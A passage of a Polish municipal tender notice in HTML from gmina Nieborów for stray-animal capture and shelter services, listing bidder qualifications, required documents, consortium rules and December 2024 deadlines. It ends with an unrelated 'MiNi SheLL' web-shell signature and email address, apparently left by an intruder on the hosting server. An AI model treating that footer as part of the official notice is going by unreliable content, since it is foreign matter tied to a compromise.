finansowej:<br/>Wykonawca spełni warunek udziału w postępowaniu jeżeli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 50.000,00 zł<br/>4) zdolności technicznej lub zawodowej:<br/>a) warunek dotyczący niezbędnego doświadczenia:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał należycie, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie:<br/> co najmniej jedną (1) usługę polegającą na utrzymaniu bezdomnych zwierząt w schronisku o łącznej wartości nie mniejszej<br/>niż 50 000 zł brutto oraz<br/> co najmniej jedną (1) usługę polegającą na wyłapywaniu bezdomnych zwierząt, o łącznej wartości usług co najmniej 20 000<br/>zł brutto,<br/>Uwagi:<br/>- Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami,<br/>wykaz winien zawierać usługi, w których wykonaniu Wykonawca bezpośrednio uczestniczył.<br/>- Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum), Zamawiający nie dopuszcza by<br/>Wykonawca polegał na doświadczeniu grupy Wykonawców, której był członkiem, jeżeli bezpośrednio nie uczestniczył w<br/>wykonaniu usług, które wykazuje jako własne doświadczenie. Zamawiający zastrzega możliwość zwrócenia się do<br/>Wykonawcy o wyjaśnienia w tym zakresie oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której<br/>wynika zakres obowiązków czy wystawionych przez Wykonawcę faktur.<br/>- Zamawiający dopuszcza wykazanie wykonania wielu usług w ramach jednego kontraktu.<br/>b) warunek dotyczący niezbędnego wyposażenia<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje następującymi narzędziami,<br/>wyposażeniem zakładu lub urządzeniami technicznymi w celu wykonania zamówienia tj.:<br/> co najmniej 1 schroniskiem dla bezdomnych zwierząt mogącym pomieścić co najmniej 60 sztuk, wyposażonym w boksy dla<br/>zdrowych zwierząt, pomieszczenia lub boksy do izolowania zwierząt chorych lub podejrzanych o chorobę, pomieszczenia<br/>lub boksy przewidziane na kwarantannę, pomieszczenia lub boksy do separacji zwierząt agresywnych.<br/> co najmniej jednego środka transportu do przewozu zwierząt spełniającego warunki określone w przepisach wskazanych w<br/>ustawie z dnia 21sierpnia 1997 o ochronie zwierząt.<br/>c) warunek dotyczący zdolności zawodowej<br/>Zamawiający uzna warunek za spełniony w tym zakresie, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował<br/>osobami zdolnymi do realizacji zamówienia, posiadającymi niezbędne kwalifikacje tj:<br/>- co najmniej jedną osobą – posiadającą tytuł zawodowy lekarza weterynarii oraz będzie się legitymowała co najmniej 3-<br/>letnim doświadczeniem zawodowym (licząc od dnia uzyskania tytułu).<br/>2. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2) Zamawiający od<br/>wykonawcy, którego oferta zostanie oceniona najwyżej będzie żądał na potwierdzenie braku podstaw wykluczenia, oświadczenia<br/>wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 Pzp – zgodnie z Załącznikiem nr 5<br/>do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.<br/>Podmiotowe środki dowodowe wymagane od Wykonawcy, którego oferta zostanie najwyżej oceniona:<br/>1) Na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający żąda poniższych podmiotowych środków<br/>dowodowych:<br/>a. aktualnego zezwolenie na prowadzenie działalności w zakresie ochrony przed bezdomnymi zwierzętami na terenie gminy<br/>Nieborów,<br/>b. aktualnego zezwolenie w zakresie prowadzenia schroniska dla bezdomnych zwierząt wydanego przez właściwy organ zgodnie z<br/>ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach,<br/>c. decyzji powiatowego lekarza weterynarii właściwego ze względu na miejsce prowadzenia działalności potwierdzającą spełnienie<br/>wymagań weterynaryjnych w zakresie transportu zwierząt wykonywanego w związku z prowadzeniem innej działalności<br/>gospodarczej, zgodnie z art. 5 ust. 1 ustawy z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych<br/>zwierząt.<br/>d. wpisu schroniska dla zwierząt do rejestru podmiotów prowadzących działalność nadzorowaną prowadzonego przez Powiatowego<br/>Lekarza Weterynarii na obszarze jego właściwości;<br/>e. wpisu do ewidencji zakładów leczniczych dla zwierząt;<br/>f. ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjna minimum 50.000,00 zł<br/>g. Wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały<br/>wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – zgodnie z Załącznikiem nr 6 do SWZ;<br/>h. Wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – zgodnie z Załącznikiem nr 7 do SWZ;<br/>i. Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z Załącznikiem nr 8 do<br/>SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2. Do oferty wykonawca dołącza:<br/>1) oświadczenie o braku podstaw wykluczenia - zgodnie z wzorem stanowiącym Załącznik nr 2 do SWZ.<br/>2) oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z wzorem stanowiącym Załącznik nr 3 do SWZ.<br/>3. Oświadczenia, o których mowa w ust. 2, stanowią dowód potwierdzający brak podstaw wykluczenia i spełnianie<br/>warunków udziału w postępowaniu, odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane przez<br/>Zamawiającego podmiotowe środki dowodowe.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w ust. 2 pkt. 1) i<br/>pkt. 2), składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniami, o których mowa w ust. 2, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające<br/>brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby (zgodnie z wzorem stanowiącym Załącznik nr 4 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się<br/>odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast spełnienie warunków udziału w postępowaniu Wykonawcy<br/>wykazują zgodnie z Działem XIV ust. 1 pkt. 4 SWZ.<br/>5. Celem wykazania braku podstaw do wykluczenia, o których mowa w Dziale X SWZ oraz spełnienia warunków udziału w<br/>postępowaniu, o których mowa w Dziale XIV ust. 1 pkt. 4) SWZ, Wykonawcy składają oświadczenia i dokumenty określone<br/>w Dziale XVII SWZ w sposób i trybie tam określonym.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>zobowiązani są dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy<br/>(zgodnie z Załącznikiem nr 10 do SWZ).<br/>7. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 455 ustawy Prawo zamówień publicznych Zamawiający zastrzega sobie możliwość istotnych zmian<br/>postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy.<br/>szczegółowy zakres zmian został określony w załączniku nr 11 do SWZ - istotne postanowienia umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gmina-nieborow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com